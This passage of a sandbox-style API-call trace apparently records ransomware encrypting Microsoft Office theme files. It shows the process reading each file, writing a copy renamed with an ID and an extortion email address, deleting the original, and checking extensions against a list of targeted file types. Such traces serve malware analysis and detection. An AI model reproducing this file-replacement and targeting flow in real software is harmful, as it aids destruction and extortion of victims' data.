lpOverlapped=0x0) returned 1 [0269.288] ReadFile (in: hFile=0x388, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.288] WriteFile (in: hFile=0x348, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xf0, lpOverlapped=0x0) returned 1 [0269.288] SetEndOfFile (hFile=0x348) returned 1 [0269.288] CloseHandle (hObject=0x348) returned 1 [0269.288] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.288] SetEndOfFile (hFile=0x388) returned 1 [0269.345] CloseHandle (hObject=0x388) returned 1 [0269.345] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.345] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx")) returned 1 [0269.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0269.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0269.346] lstrlenW (lpString=".doc") returned 4 [0269.346] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.346] lstrlenW (lpString=".docx") returned 5 [0269.346] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.346] lstrlenW (lpString=".pdf") returned 4 [0269.346] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.346] lstrlenW (lpString=".xls") returned 4 [0269.346] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.346] lstrlenW (lpString=".xlsx") returned 5 [0269.346] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.346] lstrlenW (lpString=".ppt") returned 4 [0269.346] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0269.346] lstrlenW (lpString=".zip") returned 4 [0269.346] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.346] lstrlenW (lpString=".rar") returned 4 [0269.346] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.346] lstrlenW (lpString=".bz2") returned 4 [0269.346] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.346] lstrlenW (lpString=".7z") returned 3 [0269.346] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0269.347] lstrlenW (lpString=".dbf") returned 4 [0269.347] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0269.347] lstrlenW (lpString=".1cd") returned 4 [0269.347] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0269.347] lstrlenW (lpString=".jpg") returned 4 [0269.347] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0269.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0269.347] lstrlenW (lpString=".doc") returned 4 [0269.347] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.347] lstrlenW (lpString=".docx") returned 5 [0269.347] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.347] lstrlenW (lpString=".pdf") returned 4 [0269.347] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.347] lstrlenW (lpString=".xls") returned 4 [0269.347] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.347] lstrlenW (lpString=".xlsx") returned 5 [0269.347] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.347] lstrlenW (lpString=".ppt") returned 4 [0269.347] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0269.347] lstrlenW (lpString=".zip") returned 4 [0269.347] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.347] lstrlenW (lpString=".rar") returned 4 [0269.347] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.347] lstrlenW (lpString=".bz2") returned 4 [0269.347] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.347] lstrlenW (lpString=".7z") returned 3 [0269.348] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0269.348] lstrlenW (lpString=".dbf") returned 4 [0269.348] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0269.348] lstrlenW (lpString=".1cd") returned 4 [0269.348] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0269.348] lstrlenW (lpString=".jpg") returned 4 [0269.348] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.348] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0269.348] lstrlenW (lpString="Apothecary.eftx") returned 15 [0269.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.351] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=49025) returned 1 [0269.351] CloseHandle (hObject=0x348) returned 1 [0269.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx")) returned 0x20 [0269.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.351] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.352] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.352] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.352] GetLastError () returned 0x0 [0269.352] ReadFile (in: hFile=0x348, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0xbf81, lpOverlapped=0x0) returned 1 [0269.354] WriteFile (in: hFile=0x388, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xbf90, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xbf90, lpOverlapped=0x0) returned 1 [0269.356] ReadFile (in: hFile=0x348, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.356] WriteFile (in: hFile=0x388, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xf2, lpOverlapped=0x0) returned 1 [0269.356] SetEndOfFile (hFile=0x388) returned 1 [0269.356] CloseHandle (hObject=0x388) returned 1 [0269.356] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.356] SetEndOfFile (hFile=0x348) returned 1 [0269.834] CloseHandle (hObject=0x348) returned 1 [0269.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.926] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx")) returned 1 [0269.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0269.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0269.927] lstrlenW (lpString=".doc") returned 4 [0269.927] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.927] lstrlenW (lpString=".docx") returned 5 [0269.927] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.927] lstrlenW (lpString=".pdf") returned 4 [0269.927] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.927] lstrlenW (lpString=".xls") returned 4 [0269.927] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.927] lstrlenW (lpString=".xlsx") returned 5 [0269.927] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.927] lstrlenW (lpString=".ppt") returned 4 [0269.927] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0269.927] lstrlenW (lpString=".zip") returned 4 [0269.927] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.927] lstrlenW (lpString=".rar") returned 4 [0269.927] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.927] lstrlenW (lpString=".bz2") returned 4 [0269.927] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.927] lstrlenW (lpString=".7z") returned 3 [0269.927] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0269.927] lstrlenW (lpString=".dbf") returned 4 [0269.927] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0269.927] lstrlenW (lpString=".1cd") returned 4 [0269.928] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0269.928] lstrlenW (lpString=".jpg") returned 4 [0269.928] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0269.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0269.928] lstrlenW (lpString=".doc") returned 4 [0269.928] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0269.928] lstrlenW (lpString=".docx") returned 5 [0269.928] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0269.928] lstrlenW (lpString=".pdf") returned 4 [0269.928] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0269.928] lstrlenW (lpString=".xls") returned 4 [0269.928] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0269.928] lstrlenW (lpString=".xlsx") returned 5 [0269.928] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0269.928] lstrlenW (lpString=".ppt") returned 4 [0269.928] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0269.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0269.928] lstrlenW (lpString=".zip") returned 4 [0269.928] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0269.928] lstrlenW (lpString=".rar") returned 4 [0269.928] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0269.928] lstrlenW (lpString=".bz2") returned 4 [0269.928] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0269.928] lstrlenW (lpString=".7z") returned 3 [0269.928] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0269.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0269.928] lstrlenW (lpString=".dbf") returned 4 [0269.929] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0269.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0269.929] lstrlenW (lpString=".1cd") returned 4 [0269.929] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0269.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0269.929] lstrlenW (lpString=".jpg") returned 4 [0269.929] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0269.929] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0269.929] lstrlenW (lpString="Concourse.eftx") returned 14 [0269.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.275] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=22417) returned 1 [0270.275] CloseHandle (hObject=0x3b0) returned 1 [0270.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx")) returned 0x20 [0270.297] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0270.297] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.297] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.305] GetLastError () returned 0x0 [0270.305] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x5791, lpOverlapped=0x0) returned 1 [0270.327] WriteFile (in: hFile=0x3b0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x57a0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x57a0, lpOverlapped=0x0) returned 1 [0270.328] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.328] WriteFile (in: hFile=0x3b0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xf0, lpOverlapped=0x0) returned 1 [0270.328] SetEndOfFile (hFile=0x3b0) returned 1 [0270.328] CloseHandle (hObject=0x3b0) returned 1 [0270.328] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.328] SetEndOfFile (hFile=0x39c) returned 1 [0270.342] CloseHandle (hObject=0x39c) returned 1 [0270.342] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.342] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx")) returned 1 [0270.342] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0270.342] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0270.342] lstrlenW (lpString=".doc") returned 4 [0270.342] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.342] lstrlenW (lpString=".docx") returned 5 [0270.342] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.342] lstrlenW (lpString=".pdf") returned 4 [0270.343] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.343] lstrlenW (lpString=".xls") returned 4 [0270.343] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.343] lstrlenW (lpString=".xlsx") returned 5 [0270.343] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.343] lstrlenW (lpString=".ppt") returned 4 [0270.343] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0270.343] lstrlenW (lpString=".zip") returned 4 [0270.343] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.343] lstrlenW (lpString=".rar") returned 4 [0270.343] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.343] lstrlenW (lpString=".bz2") returned 4 [0270.343] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.343] lstrlenW (lpString=".7z") returned 3 [0270.343] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0270.343] lstrlenW (lpString=".dbf") returned 4 [0270.343] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0270.343] lstrlenW (lpString=".1cd") returned 4 [0270.343] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0270.343] lstrlenW (lpString=".jpg") returned 4 [0270.343] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0270.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0270.343] lstrlenW (lpString=".doc") returned 4 [0270.344] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.344] lstrlenW (lpString=".docx") returned 5 [0270.344] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.344] lstrlenW (lpString=".pdf") returned 4 [0270.344] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.344] lstrlenW (lpString=".xls") returned 4 [0270.344] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.344] lstrlenW (lpString=".xlsx") returned 5 [0270.344] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.344] lstrlenW (lpString=".ppt") returned 4 [0270.344] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0270.344] lstrlenW (lpString=".zip") returned 4 [0270.344] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.344] lstrlenW (lpString=".rar") returned 4 [0270.344] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.344] lstrlenW (lpString=".bz2") returned 4 [0270.344] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.344] lstrlenW (lpString=".7z") returned 3 [0270.344] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0270.345] lstrlenW (lpString=".dbf") returned 4 [0270.345] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0270.345] lstrlenW (lpString=".1cd") returned 4 [0270.345] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned 81 [0270.345] lstrlenW (lpString=".jpg") returned 4 [0270.345] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.345] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0270.345] lstrlenW (lpString="Equity.eftx") returned 11 [0270.345] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0270.346] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=24611) returned 1 [0270.346] CloseHandle (hObject=0x39c) returned 1 [0270.346] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx")) returned 0x20 [0270.346] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0270.346] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.346] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0270.347] GetLastError () returned 0x0 [0270.347] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x6023, lpOverlapped=0x0) returned 1 [0270.349] WriteFile (in: hFile=0x388, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x6030, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x6030, lpOverlapped=0x0) returned 1 [0270.350] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.350] WriteFile (in: hFile=0x388, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0270.350] SetEndOfFile (hFile=0x388) returned 1 [0270.350] CloseHandle (hObject=0x388) returned 1 [0270.350] 